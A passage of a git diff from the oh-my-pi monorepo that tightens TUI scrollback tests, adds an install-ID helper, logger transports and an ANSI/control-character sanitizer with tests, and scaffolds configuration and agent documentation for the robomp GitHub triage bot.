i++) { - component.setLines(buildRows(280 + (i % 6) * 15)); + for (let i = 0; i < 18; i++) { + component.setLines(buildRows(140 + (i % 6) * 8)); term.resize(i % 2 === 0 ? 59 : 60, i % 3 === 0 ? 11 : 10); tui.requestRender(); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); const viewportRows = viewportRowNumbers(term); expect(viewportRows.length).toBeGreaterThan(0); } const scrollback = term.getScrollBuffer(); - expect(scrollback.length - before).toBeLessThan(700); + expect(scrollback.length - before).toBeLessThan(220); expect(longestBlankRun(scrollback)).toBeLessThan(30); } finally { tui.stop(); @@ -352,34 +335,30 @@ describe("TUI overlays", () => { it("limits scrollback while toggling overlays over overflowing content", async () => { const term = new VirtualTerminal(60, 10); const tui = new TUI(term); - const component = new MutableContentComponent(buildRows(300)); + const component = new MutableContentComponent(buildRows(150)); tui.addChild(component); try { tui.start(); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); const before = term.getScrollBuffer().length; - for (let i = 0; i < 50; i++) { + for (let i = 0; i < 12; i++) { const handle = tui.showOverlay(new LineComponent(`overlay-${i}-`, 3), { anchor: "center" }); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); handle.hide(); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); - if (i % 5 === 0) { - component.setLines(buildRows(280 + (i % 4) * 10)); + if (i % 4 === 0) { + component.setLines(buildRows(140 + (i % 4) * 10)); tui.requestRender(); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); } expect(viewportRowNumbers(term).length).toBeGreaterThan(0); } const scrollback = term.getScrollBuffer(); - expect(scrollback.length - before).toBeLessThan(1200); + expect(scrollback.length - before).toBeLessThan(320); expect(longestBlankRun(scrollback)).toBeLessThan(50); } finally { tui.stop(); @@ -389,23 +368,21 @@ describe("TUI overlays", () => { it("keeps scrollback bounded under rapid micro-resize oscillation", async () => { const term = new VirtualTerminal(80, 12); const tui = new TUI(term); - const component = new MutableContentComponent(buildRows(360)); + const component = new MutableContentComponent(buildRows(180)); tui.addChild(component); try { tui.start(); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); const before = term.getScrollBuffer().length; - for (let i = 0; i < 120; i++) { + for (let i = 0; i < 24; i++) { term.resize(i % 2 === 0 ? 79 : 80, i % 3 === 0 ? 11 : 12); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); expect(viewportRowNumbers(term).length).toBeGreaterThan(0); } const scrollback = term.getScrollBuffer(); - expect(scrollback.length - before).toBeLessThan(1300); + expect(scrollback.length - before).toBeLessThan(320); expect(longestBlankRun(scrollback)).toBeLessThan(60); } finally { tui.stop(); @@ -415,17 +392,15 @@ describe("TUI overlays", () => { it("avoids scrollback growth on repeated no-op renders with overflowing content", async () => { const term = new VirtualTerminal(70, 10); const tui = new TUI(term); - tui.addChild(new MutableContentComponent(buildRows(260))); + tui.addChild(new MutableContentComponent(buildRows(130))); try { tui.start(); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); const before = term.getScrollBuffer().length; - for (let i = 0; i < 80; i++) { + for (let i = 0; i < 16; i++) { tui.requestRender(); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); } const scrollback = term.getScrollBuffer(); @@ -437,25 +412,23 @@ describe("TUI overlays", () => { it("stays stable with direct row-delta movement", async () => { const term = new VirtualTerminal(50, 10); const tui = new TUI(term); - const component = new MutableContentComponent(buildRows(260)); + const component = new MutableContentComponent(buildRows(150)); tui.addChild(component); try { tui.start(); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); const before = term.getScrollBuffer().length; - for (let i = 0; i < 60; i++) { - component.setLines(buildRows(220 + (i % 8) * 12)); + for (let i = 0; i < 18; i++) { + component.setLines(buildRows(120 + (i % 8) * 6)); term.resize(i % 2 === 0 ? 50 : 49, i % 3 === 0 ? 11 : 10); tui.requestRender(); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); expect(viewportRowNumbers(term).length).toBeGreaterThan(0); } const scrollback = term.getScrollBuffer(); - expect(scrollback.length - before).toBeLessThan(900); + expect(scrollback.length - before).toBeLessThan(260); expect(longestBlankRun(scrollback)).toBeLessThan(40); } finally { tui.stop(); diff --git a/packages/tui/test/render-regressions.test.ts b/packages/tui/test/render-regressions.test.ts index 34656101d..3aebebd9a 100644 --- a/packages/tui/test/render-regressions.test.ts +++ b/packages/tui/test/render-regressions.test.ts @@ -1,4 +1,4 @@ -import { afterEach, describe, expect, it, vi } from "bun:test"; +import { afterEach, beforeEach, describe, expect, it, vi } from "bun:test"; import { type Component, TUI } from "@oh-my-pi/pi-tui"; import { VirtualTerminal } from "./virtual-terminal"; @@ -25,7 +25,9 @@ function rows(prefix: string, count: number): string[] { } async function settle(term: VirtualTerminal): Promise<void> { - await term.waitForRender(); + await new Promise<void>(resolve => process.nextTick(resolve)); + await Bun.sleep(1); + await term.flush(); } function visible(term: VirtualTerminal): string[] { @@ -41,6 +43,21 @@ function countMatches(lines: string[], pattern: RegExp): number { } describe("TUI terminal-state regressions", () => { + let monotonicNow = 0; + // Keep TUI's 16ms render throttle deterministic without sleeping a real frame per render. + + beforeEach(() => { + monotonicNow = 0; + vi.spyOn(performance, "now").mockImplementation(() => { + monotonicNow += 20; + return monotonicNow; + }); + }); + + afterEach(() => { + vi.restoreAllMocks(); + }); + describe("cursor + differential stability", () => { it("keeps stable output across repeated no-op renders", async () => { const term = new VirtualTerminal(40, 10); diff --git a/packages/utils/package.json b/packages/utils/package.json index 1149962eb..0b9007085 100644 --- a/packages/utils/package.json +++ b/packages/utils/package.json @@ -31,14 +31,14 @@ "fmt": "biome format --write ." }, "dependencies": { + "@oh-my-pi/pi-natives": "catalog:", "beautiful-mermaid": "catalog:", "handlebars": "catalog:", "winston": "catalog:", "winston-daily-rotate-file": "catalog:" }, "devDependencies": { - "@types/bun": "catalog:", - "@oh-my-pi/pi-natives": "catalog:" + "@types/bun": "catalog:" }, "engines": { "bun": ">=1.3.14" diff --git a/packages/utils/src/dirs.ts b/packages/utils/src/dirs.ts index ef9329be7..8d4e2e389 100644 --- a/packages/utils/src/dirs.ts +++ b/packages/utils/src/dirs.ts @@ -477,3 +477,76 @@ export function getSSHConfigPath(scope: "user" | "project", cwd: string = getPro } return path.join(getProjectAgentDir(cwd), "ssh.json"); } + +// ============================================================================= +// Install identity +// ============================================================================= + +let cachedInstallId: string | null = null; + +const INSTALL_ID_FILE = "install-id"; +const UUID_RE = /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i; + +/** + * Persistent per-install UUID stored at `~/.omp/install-id`. + * + * Generated lazily on first call and persisted with `O_CREAT|O_EXCL` so + * concurrent first-call races don't clobber each other (loser re-reads the + * winner's id). Survives independently of agent state: deleting + * `~/.omp/agent/` does not regenerate it. Server-side dedup for grievance + * pushes (and similar telemetry) keys on this id. + */ +export function getInstallId(): string { + if (cachedInstallId) return cachedInstallId; + const filePath = path.join(getConfigRootDir(), INSTALL_ID_FILE); + + let observedInvalid = false; + try { + const existing = fs.readFileSync(filePath, "utf8").trim(); + if (UUID_RE.test(existing)) { + cachedInstallId = existing; + return existing; + } + // File present but unparseable — fall through and overwrite below. + observedInvalid = existing.length > 0; + } catch {} + + const next = crypto.randomUUID(); + try { + fs.mkdirSync(path.dirname(filePath), { recursive: true }); + // If we already saw garbage in the file, unlink first so O_EXCL doesn't + // trip on it. Ignored if the unlink races against another writer. + if (observedInvalid) { + try { + fs.unlinkSync(filePath); + } catch {} + } + const fd = fs.openSync(filePath, fs.constants.O_WRONLY | fs.constants.O_CREAT | fs.constants.O_EXCL, 0o600); + try { + fs.writeSync(fd, `${next}\n`); + } finally { + fs.closeSync(fd); + } + } catch (err) { + // Lost the create race — re-read whatever the winner wrote. + if ((err as NodeJS.ErrnoException).code === "EEXIST") { + try { + const existing = fs.readFileSync(filePath, "utf8").trim(); + if (UUID_RE.test(existing)) { + cachedInstallId = existing; + return existing; + } + } catch {} + } + // Any other failure: keep the generated id in-memory so the rest of + // this process has a stable value; future processes will retry. + } + + cachedInstallId = next; + return next; +} + +/** Test-only: clear cached install id. Never call from production code. */ +export function __resetInstallIdCacheForTests(): void { + cachedInstallId = null; +} diff --git a/packages/utils/src/index.ts b/packages/utils/src/index.ts index 80ef33c4d..884ae684e 100644 --- a/packages/utils/src/index.ts +++ b/packages/utils/src/index.ts @@ -19,6 +19,7 @@ export * as procmgr from "./procmgr"; export * as prompt from "./prompt"; export * as ptree from "./ptree"; export { AbortError, ChildProcess, Exception, NonZeroExitError } from "./ptree"; +export * from "./sanitize-text"; export * from "./snowflake"; export * from "./stream"; export * from "./tab-spacing"; diff --git a/packages/utils/src/logger.ts b/packages/utils/src/logger.ts index 7b7270962..1934abcae 100644 --- a/packages/utils/src/logger.ts +++ b/packages/utils/src/logger.ts @@ -1,8 +1,13 @@ /** - * Centralized file logger for omp. + * Centralized logger for omp. * - * Logs to ~/.omp/logs/ with size-based rotation, supporting concurrent omp instances. - * Each log entry includes process.pid for traceability. + * Default: rotating `~/.omp/logs/omp.<DATE>.log`, no console output (writing + * to stdout/stderr would corrupt the TUI). Long-running headless services + * (the auth broker, etc.) call {@link setTransports} to swap in a console + * transport so a process supervisor (pm2, journald, k8s) captures the logs. + * + * Each entry includes `process.pid` so concurrent omp instances stay + * traceable. */ import { AsyncLocalStorage } from "node:async_hooks"; import * as fs from "node:fs"; @@ -10,13 +15,12 @@ import winston from "winston"; import DailyRotateFile from "winston-daily-rotate-file"; import { getLogsDir } from "./dirs"; -/** Ensure logs directory exists */ -function ensureLogsDir(): string { - const logsDir = getLogsDir(); - if (!fs.existsSync(logsDir)) { - fs.mkdirSync(logsDir, { recursive: true }); +/** Ensure a logs directory exists; return the resolved path. */ +function ensureDir(dir: string): string { + if (!fs.existsSync(dir)) { + fs.mkdirSync(dir, { recursive: true }); } - return logsDir; + return dir; } /** Custom format that includes pid and flattens metadata */ @@ -39,25 +43,44 @@ const logFormat = winston.format.combine( }), ); -/** Size-based rotating file transport */ -const fileTransport = new DailyRotateFile({ - dirname: ensureLogsDir(), - filename: "omp.%DATE%.log", - datePattern: "YYYY-MM-DD", - maxSize: "10m", - maxFiles: 5, - zippedArchive: true, -}); +/** Build a rotating file transport, materializing the target directory lazily. */ +function makeFileTransport(dir?: string): winston.transport { + return new DailyRotateFile({ + dirname: ensureDir(dir ?? getLogsDir()), + filename: "omp.%DATE%.log", + datePattern: "YYYY-MM-DD", + maxSize: "10m", + maxFiles: 5, + zippedArchive: true, + }); +} -/** The winston logger instance */ +function makeConsoleTransport(): winston.transport { + return new winston.transports.Console({ format: logFormat }); +} + +/** The winston logger instance. Default: file ON (TUI-safe), console OFF. */ const winstonLogger = winston.createLogger({ level: "debug", format: logFormat, - transports: [fileTransport], + transports: [makeFileTransport()], // Don't exit on error - logging failures shouldn't crash the app exitOnError: false, }); +/** + * Replace the active log transports. Pass `console: true, file: false` for + * long-running services (the auth broker, etc.) that want their structured + * logs piped into a process supervisor instead of the rotating file. + */ +export function setTransports(opts: { console?: boolean; file?: boolean | string }): void { + winstonLogger.clear(); + if (opts.file) { + winstonLogger.add(makeFileTransport(typeof opts.file === "string" ? opts.file : undefined)); + } + if (opts.console) winstonLogger.add(makeConsoleTransport()); +} + /** * Log an error message. * @param message - The message to log. @@ -84,6 +107,19 @@ export function warn(message: string, context?: Record<string, unknown>): void { } } +/** + * Log an informational message. + * @param message - The message to log. + * @param context - The context to log. + */ +export function info(message: string, context?: Record<string, unknown>): void { + try { + winstonLogger.info(message, context); + } catch { + // Silently ignore logging failures + } +} + /** * Log a debug message. * @param message - The message to log. diff --git a/packages/utils/src/sanitize-text.ts b/packages/utils/src/sanitize-text.ts new file mode 100644 index 000000000..784faf78b --- /dev/null +++ b/packages/utils/src/sanitize-text.ts @@ -0,0 +1,38 @@ +/** + * Strip ANSI escape sequences, remove control characters / lone surrogates, + * and normalize line endings. + * + * Bun-native implementation of the former native `sanitizeText` (see + * `crates/pi-natives/src/text.rs::sanitize_text`). JavaScript strings are + * already UTF-16 code-unit arrays. `toWellFormed()` handles the uncommon + * malformed path; when it changes the input, replacement characters are + * dropped and the normalized result goes through the well-formed sanitizer. + * + * Fast path: well-formed input with no controls or ANSI returns the original + * string after the control probe. + */ + +const ESC_CHAR = "\x1b"; + +// Well-formed strings only need control/ANSI detection: C0 (excl. \t \n), +// CR, DEL, and C1. ESC (0x1B) is in \x0B-\x1F. +const CONTROL_RE = /[\x00-\x08\x0B-\x1F\x7F-\x9F]/g; + +const REPLACEMENT_CHAR = "\ufffd"; + +export function sanitizeText(text: string): string { + const wellFormed = text.toWellFormed(); + if (wellFormed !== text) { + return sanitizeWellFormedText(wellFormed.replaceAll(REPLACEMENT_CHAR, "")); + } + return sanitizeWellFormedText(text); +} + +function sanitizeWellFormedText(text: string): string { + CONTROL_RE.lastIndex = 0; + if (CONTROL_RE.exec(text) === null) return text; + + const stripped = text.indexOf(ESC_CHAR) === -1 ? text : Bun.stripANSI(text); + CONTROL_RE.lastIndex = 0; + return stripped.replace(CONTROL_RE, ""); +} diff --git a/packages/utils/test/install-id.test.ts b/packages/utils/test/install-id.test.ts new file mode 100644 index 000000000..998051176 --- /dev/null +++ b/packages/utils/test/install-id.test.ts @@ -0,0 +1,72 @@ +import { afterEach, beforeEach, describe, expect, it } from "bun:test"; +import * as fs from "node:fs/promises"; +import * as os from "node:os"; +import * as path from "node:path"; +import { __resetInstallIdCacheForTests, getAgentDir, getConfigRootDir, getInstallId, setAgentDir } from "../src/dirs"; +import { Snowflake } from "../src/snowflake"; + +const UUID_RE = /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i; + +describe("getInstallId", () => { + let tempRoot = ""; + let originalAgentDir = ""; + let originalConfigDir: string | undefined; + + beforeEach(async () => { + originalAgentDir = getAgentDir(); + originalConfigDir = process.env.PI_CONFIG_DIR; + const slug = `omp-install-id-${Snowflake.next()}`; + tempRoot = path.join(os.tmpdir(), slug); + await fs.mkdir(tempRoot, { recursive: true }); + // Point the resolver's config root at the temp dir. Using PI_CONFIG_DIR + // keeps the parent equal to os.homedir() but flips the basename, so the + // install-id file lands inside our temp tree. + process.env.PI_CONFIG_DIR = path.relative(os.homedir(), tempRoot); + setAgentDir(path.join(tempRoot, "agent")); + __resetInstallIdCacheForTests(); + }); + + afterEach(async () => { + __resetInstallIdCacheForTests(); + if (originalConfigDir === undefined) { + delete process.env.PI_CONFIG_DIR; + } else { + process.env.PI_CONFIG_DIR = originalConfigDir; + } + setAgentDir(originalAgentDir); + await fs.rm(tempRoot, { recursive: true, force: true }); + }); + + it("generates and persists a UUID on first call", async () => { + const id = getInstallId(); + expect(id).toMatch(UUID_RE); + + const onDisk = (await fs.readFile(path.join(getConfigRootDir(), "install-id"), "utf8")).trim(); + expect(onDisk).toBe(id); + }); + + it("returns the cached value on subsequent calls without re-reading", async () => { + const first = getInstallId(); + await fs.writeFile(path.join(getConfigRootDir(), "install-id"), "deadbeef-0000-0000-0000-000000000000\n"); + // Cache wins until reset. + expect(getInstallId()).toBe(first); + }); + + it("loads an existing valid UUID instead of regenerating", async () => { + const existing = "11111111-2222-3333-4444-555555555555"; + await fs.mkdir(getConfigRootDir(), { recursive: true }); + await fs.writeFile(path.join(getConfigRootDir(), "install-id"), `${existing}\n`); + expect(getInstallId()).toBe(existing); + }); + + it("regenerates and persists when the on-disk contents are not a valid UUID", async () => { + await fs.mkdir(getConfigRootDir(), { recursive: true }); + await fs.writeFile(path.join(getConfigRootDir(), "install-id"), "not-a-uuid\n"); + const id = getInstallId(); + expect(id).toMatch(UUID_RE); + expect(id).not.toBe("not-a-uuid"); + + const onDisk = (await fs.readFile(path.join(getConfigRootDir(), "install-id"), "utf8")).trim(); + expect(onDisk).toBe(id); + }); +}); diff --git a/packages/utils/test/sanitize-text.test.ts b/packages/utils/test/sanitize-text.test.ts new file mode 100644 index 000000000..b6d28ab23 --- /dev/null +++ b/packages/utils/test/sanitize-text.test.ts @@ -0,0 +1,53 @@ +import { describe, expect, it } from "bun:test"; +import { sanitizeText } from "../src/sanitize-text"; + +describe("sanitizeText", () => { + it("strips ANSI CSI and removes C0/C1 control chars while keeping tab + LF", () => { + const input = "\x1b[31mred\x1b[0m\ra\u0000b\tline\ncarriage\r\u0001\u0085"; + expect(sanitizeText(input)).toBe("redab\tline\ncarriage"); + }); + + it("drops lone surrogates and preserves valid surrogate pairs", () => { + expect(sanitizeText(`a\ud800b\udc00c`)).toBe("abc"); + const validPair = "a\u{1f600}b"; + expect(sanitizeText(validPair)).toBe(validPair); + }); + + it("drops replacement characters on malformed input", () => { + expect(sanitizeText("a\ud800�b")).toBe("ab"); + }); + + it("preserves replacement characters on well-formed input", () => { + expect(sanitizeText("a�b")).toBe("a�b"); + }); + + it("preserves valid surrogate pairs while stripping controls", () => { + const validPair = "\u{1f600}"; + expect(sanitizeText(`a${validPair}\u0000b`)).toBe(`a${validPair}b`); + }); + + it("strips OSC sequences terminated by BEL", () => { + expect(sanitizeText("\x1b]0;title\x07hello")).toBe("hello"); + }); + + it("strips OSC sequences terminated by ST (ESC \\)", () => { + expect(sanitizeText("\x1b]8;;https://x\x1b\\link\x1b]8;;\x1b\\!")).toBe("link!"); + }); + + it("returns the original string instance when no changes are needed", () => { + const clean = "plain ascii\twith\ttabs\nand newlines"; + expect(sanitizeText(clean)).toBe(clean); + }); + + it("strips DCS sequences terminated by ST", () => { + expect(sanitizeText("before\x1bPpayload\x1b\\after")).toBe("beforeafter"); + }); + + it("handles single-byte ESC finals (e.g. ESC c reset)", () => { + expect(sanitizeText("a\x1bcb")).toBe("ab"); + }); + + it("strips DEL and normalizes lone CR", () => { + expect(sanitizeText("a\x7fb\rc")).toBe("abc"); + }); +}); diff --git a/packages/utils/test/stream.test.ts b/packages/utils/test/stream.test.ts index e4d8c7f60..025025260 100644 --- a/packages/utils/test/stream.test.ts +++ b/packages/utils/test/stream.test.ts @@ -1,5 +1,5 @@ import { describe, expect, it } from "bun:test"; -import { sanitizeText } from "@oh-my-pi/pi-natives"; +import { sanitizeText } from "../src/sanitize-text"; import { parseJsonlLenient, readJsonl, diff --git a/python/robomp/.dockerignore b/python/robomp/.dockerignore new file mode 100644 index 000000000..227f20ad6 --- /dev/null +++ b/python/robomp/.dockerignore @@ -0,0 +1,15 @@ +.venv/ +.pi-context/ +data/ +*.pyc +__pycache__/ +.pytest_cache/ +.git/ +.env +*.sqlite +*.sqlite-wal +*.sqlite-shm +web/node_modules/ +web/dist/ +src/static/ +node_modules/ diff --git a/python/robomp/.env.example b/python/robomp/.env.example new file mode 100644 index 000000000..235181162 --- /dev/null +++ b/python/robomp/.env.example @@ -0,0 +1,172 @@ +# ============================================================================= +# roboomp environment +# ============================================================================= +# +# This file is read in two distinct ways and you MUST keep that in mind when +# filling it in: +# +# 1. `docker compose` interpolates `${VAR}` references in docker-compose.yml. +# The compose file uses per-service explicit `environment:` allowlists +# (NO `env_file:`), so only the keys listed in each service's block flow +# into the corresponding container — never the whole .env. +# +# 2. The Python `Settings` loader (`src/config.py`) also reads `.env` +# for any local CLI invocation (e.g. `python -m robomp.cli triage …` +# running on the host outside docker). `_validate_proxy_or_pat` fails +# fast if BOTH a PAT and `ROBOMP_GH_PROXY_URL` are configured, so the +# two modes below are mutually exclusive. +# +# Pick ONE of the two mode blocks below; leave the other fully commented out. +# Variables under "### shared ###" apply in either mode. + + +# ============================================================================= +# ### shared ### — required regardless of mode +# ============================================================================= + +# Shared HMAC secret used to verify webhook signatures. Must match the secret +# configured in the GitHub webhook UI / settings. +GITHUB_WEBHOOK_SECRET= + +# Login name of the bot account whose PAT is in GITHUB_TOKEN (or whichever +# account the gh-proxy authenticates as). Used to skip webhook events authored +# by the bot itself. +ROBOMP_BOT_LOGIN= + +# Commit identity for branches the bot pushes. The email is what reviewers and +# GitHub will display next to the commit; pick one that matches how you want +# bot-authored commits to appear (a no-reply alias, a real address, etc.). +# `gh_push_branch` refuses to push unless every commit on the workspace branch +# carries this exact name + email. +ROBOMP_GIT_AUTHOR_NAME= +ROBOMP_GIT_AUTHOR_EMAIL= + +# Comma-separated owner/repo entries the bot is allowed to act on. +ROBOMP_REPO_ALLOWLIST= + + +# ============================================================================= +# ### gh-proxy mode (RECOMMENDED, default in docker compose) ### +# +# The orchestrator NEVER holds the PAT; it talks to the sibling gh-proxy +# container over an internal-only docker network, authenticated with a +# shared HMAC key. Fill in BOTH variables below and leave the PAT mode +# block fully commented out. +# ============================================================================= + +# Shared HMAC secret the orchestrator uses to authenticate every request to +# gh-proxy. The two containers MUST agree on this value. The proxy refuses +# any unsigned request; the orchestrator refuses to start without it. +# Generate with: openssl rand -hex 32 +ROBOMP_GH_PROXY_HMAC_KEY= + +# URL the orchestrator uses to reach gh-proxy. The default below matches the +# service name + port in docker-compose.yml; override only for local +# development outside compose (e.g. `http://127.0.0.1:8081`). +ROBOMP_GH_PROXY_URL=http://gh-proxy:8081 + +# PAT with `repo` (push, comment, PR) scope. A fine-grained token scoped to +# the allowlisted repos is recommended; a classic PAT also works. +# +# In gh-proxy mode this value lives ONLY in the gh-proxy container's +# environment (compose interpolates it into gh-proxy's allowlist only). +# Settings refuses to construct an orchestrator config that sees both +# GITHUB_TOKEN and ROBOMP_GH_PROXY_URL, so when running orchestrator code +# directly on the host (CLI, tests) you MUST keep GITHUB_TOKEN unset. +GITHUB_TOKEN= + + +# ============================================================================= +# ### PAT mode (single-process, no sidecar) ### +# +# Drop the gh-proxy entirely and let the orchestrator hold the PAT directly. +# To use this mode: uncomment GITHUB_TOKEN below, leave ROBOMP_GH_PROXY_URL +# and ROBOMP_GH_PROXY_HMAC_KEY UNSET (above), and run the orchestrator +# outside of the bundled docker-compose (which is wired for proxy mode). +# ============================================================================= + +# GITHUB_TOKEN=ghp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx + + +# ============================================================================= +# --- Model selection --- +# ============================================================================= +# Either a single model id or a comma-separated pool — roboomp picks one +# uniformly at random per task. Use the `<provider>/<model>` form that matches +# your ~/.omp/agent/models.container.yml (which is mounted into the container as models.yml). +ROBOMP_MODEL=anthropic/claude-sonnet-4-6 +# off|low|medium|high +ROBOMP_THINKING=high +# Optional provider override (passed to `omp --provider`). +# ROBOMP_PROVIDER= + + +# ============================================================================= +# --- Runtime --- +# ============================================================================= +ROBOMP_MAX_CONCURRENCY=8 +ROBOMP_TASK_TIMEOUT_SECONDS=2400 +ROBOMP_TASK_TIMEOUT_HARD_GRACE_SECONDS=60 +ROBOMP_REQUEST_TIMEOUT_SECONDS=120 + + +# ============================================================================= +# --- Per-submitter rate limiting --- +# ============================================================================= +# Rolling window plus per-tier caps on queue-worthy submissions per +# GitHub login. Accounts whose webhook payload reports author_association +# OWNER/MEMBER/COLLABORATOR bypass the limiter automatically. Use the +# unlimited list (comma-separated logins, `@` optional) to whitelist +# additional users — e.g. yourself when developing outside the repo. +ROBOMP_RATE_LIMIT_WINDOW_SECONDS=3600 +ROBOMP_RATE_LIMIT_DEFAULT=3 +ROBOMP_RATE_LIMIT_CONTRIBUTOR=10 +ROBOMP_RATE_LIMIT_UNLIMITED= + + +# ============================================================================= +# --- Question auto-close --- +# ============================================================================= +# When the bot answers an issue classified as `question` it appends a +# 👎-to-keep-open prompt and schedules the issue to close as +# `state_reason=completed` after `HOURS`. Set `ENABLED=false` (or `HOURS=0`) +# to disable. Cancellation is automatic on a follow-up comment, an external +# close, or the issue author downvoting the bot's comment. +ROBOMP_QUESTION_AUTOCLOSE_ENABLED=true +ROBOMP_QUESTION_AUTOCLOSE_HOURS=4 +# How often the scheduler scans for due rows. 60s is plenty given the +# multi-hour close window. +ROBOMP_QUESTION_AUTOCLOSE_SCAN_SECONDS=60 + +# Path or command name for the omp binary inside the container. The shipped +# image installs a shim that invokes Bun against the mounted pi checkout. +ROBOMP_OMP_COMMAND=omp + + +# ============================================================================= +# --- Paths (inside the container) --- +# ============================================================================= +ROBOMP_WORKSPACE_ROOT=/data/workspaces +ROBOMP_SQLITE_PATH=/data/robomp.sqlite +ROBOMP_LOG_DIR=/data/logs + + +# ============================================================================= +# --- Dev only --- +# ============================================================================= +# Bind address for the webhook receiver. +ROBOMP_BIND_HOST=0.0.0.0 +ROBOMP_BIND_PORT=8080 + +# Optional token enabling the POST /replay endpoint; leave blank to disable. +# ROBOMP_REPLAY_TOKEN= + +# ============================================================================= +# --- oh-my-pi source location (host side) --- +# ============================================================================= +# robomp lives inside the oh-my-pi monorepo at `python/robomp/`. The default +# `bun run robomp:pi-artifacts` builds the parent monorepo (`../..`) as its docker +# build context, and `docker-compose.yml` mounts that same path read-only at +# `/work/pi` inside the container. Override `PI_ROOT` only if you want to point +# the build/mount at a different oh-my-pi checkout. +# PI_ROOT=../.. diff --git a/python/robomp/.gitignore b/python/robomp/.gitignore new file mode 100644 index 000000000..d8adcc6cc --- /dev/null +++ b/python/robomp/.gitignore @@ -0,0 +1,26 @@ +.venv/ +.pi-context/ +.cache/ +data/ +__pycache__/ +*.pyc +.pytest_cache/ +.env +*.sqlite +*.sqlite-wal +*.sqlite-shm +build/ +dist/ +*.egg-info/ +.DS_Store +.idea/ +.vscode/ +node_modules/ +*.tsbuildinfo +.vite/ + +# Frontend bundle. The Vite build (`bun run web:build` / Docker `web-builder` +# stage) writes hashed JS/CSS chunks into `src/static/`. Nothing +# committed; the test suite synthesises a minimal placeholder via conftest. +src/static/ +web/dist/ diff --git a/python/robomp/AGENTS.md b/python/robomp/AGENTS.md new file mode 100644 index 000000000..2e2d1bd5e --- /dev/null +++ b/python/robomp/AGENTS.md @@ -0,0 +1,125 @@ +# Repository Guidelines + +## Project Overview + +`roboomp` is a self-hosted GitHub triage-and-fix bot that drives [`omp --mode rpc`](https://github.com/can1357/oh-my-pi) as a subprocess. On every issue opened in an allowlisted repository it classifies the issue, applies labels, then branches into one of: reproduce → fix → PR (`bug` / `documentation`), single-comment answer (`question`), single thoughtful comment (`enhancement` / `proposal`), or brief comment (`invalid` / `duplicate`). Follow-up comments and PR review comments resume the same omp session so the agent keeps its prior reasoning. If the orchestrator restarts mid-task, the dispatcher resumes the same session via `omp --continue` from the per-issue `session_dir`, so an interrupted task re-enters its prior reasoning instead of restarting from scratch. The orchestrator runs as a single FastAPI process inside Docker with SQLite-backed durable event state. + +## Architecture & Data Flow + +Webhook → durable queue → async dispatcher → per-issue git worktree → omp RPC subprocess + host tools. + +1. `POST /webhook/github` — HMAC-SHA256 verified against `GITHUB_WEBHOOK_SECRET` (`server.py` + `github_events.verify_signature`). Bad signature returns `401`. +2. `github_events.route()` decides one of `triage_issue` / `handle_comment` / `handle_pr_conversation` / `handle_review` / `cleanup_workspace` / `skip`. Bot-authored events (`*[bot]`, `user.type == "Bot"`, configured `bot_login`) and non-allowlisted repos are dropped here. +3. `db.record_event()` inserts the event with `INSERT OR IGNORE` on `X-GitHub-Delivery` (dedup). Endpoint returns `202`. +4. `queue.WorkerPool._dispatch_loop` atomically claims `state='queued'` rows under `BEGIN IMMEDIATE`, guarded by an in-process `_inflight` set keyed by `(owner, repo, number)` to serialize per-issue work. Cap: `ROBOMP_MAX_CONCURRENCY` (default 8). +5. `sandbox.SandboxManager.ensure_workspace()` produces a worktree at `/data/workspaces/<owner>__<repo>__<n>/repo` on a deterministic branch `farm/<8hex>/<slug>`, backed by a shared `--filter=blob:none` clone pool. Credentialed remote URL and git identity are reset every time. +6. `tasks.*` dispatchers build `TaskInputs` and call `worker.run_task()` which spawns `omp --mode rpc` with `cwd=worktree`, persistent `session_dir`, and a randomly-picked model from `ROBOMP_MODEL` (CSV pool). When `<session_dir>/*.jsonl` already exists the worker passes `--continue`, so both follow-up events and crash-restarted events resume the same session. +7. Inside the subprocess the agent uses **built-in omp tools** (read/edit/write/bash/lsp, scoped to the worktree) and **host tools** from `host_tools.py` (the only surface allowed to mutate GitHub or write audit rows). +8. Success → event `state='done'`. Exception → `state='failed'` with a credential-redacted traceback in `events.last_error`. The `_inflight` slot is released either way. + +## Key Directories + +- `src/` — package (see "Important Files"). +- `src/prompts/` — Mustache-style `{{var}}` templates loaded by `persona.py` via `@cache` and `importlib.resources`. Shipped as package data (`pyproject.toml` `package-data`). +- `tests/` — pytest suite. `test_worker_smoke.py` is gated on `ROBOMP_INTEGRATION=1`. +- `data/` — runtime state (sqlite + WAL, `workspaces/`, `logs/`). Never committed. +- `/work/pi/Dockerfile` — produces `oh-my-pi/artifacts:dev` (pi-natives `.node` + omp-rpc wheel). Built once per pi-source change via `bun run robomp:pi-artifacts`; roboomp's runtime image consumes it via `COPY --from=`. + +## Development Commands + +Task runner is `bun` against the **monorepo root** `package.json`. roboomp itself no longer ships a `package.json`; every recipe lives at the root under the `robomp:*` namespace. Local venv (no docker): `bun run robomp:install` runs `pip install -e 'python/robomp[dev]'`. From there: + +``` +bun run test:py # pytest -x python/omp-rpc/tests python/robomp/tests +bun run robomp:test:integration # ROBOMP_INTEGRATION=1, requires omp on PATH +bun run robomp:serve # python -m robomp serve on the host +``` + +Docker inner loop: + +``` +bun run robomp:build # pi-artifacts (if pi changed) + docker compose build +bun run robomp:dev # build + up -d + follow logs +bun run robomp:up / robomp:down / robomp:restart / robomp:logs +bun run robomp:rebuild # docker compose build --no-cache +bun run robomp:reset # `down -v` + drop the pi-artifacts image +``` + +Frontend (Vite + SolidJS, in `web/` — still a bun workspace): + +``` +bun run robomp:web:dev # vite dev server with proxy to :8080 +bun run robomp:web:build # produce src/static/ bundle +bun --cwd=python/robomp/web run typecheck # tsc --noEmit +``` + +In-container CLI (`robomp` console script → `robomp.cli:main`): no root 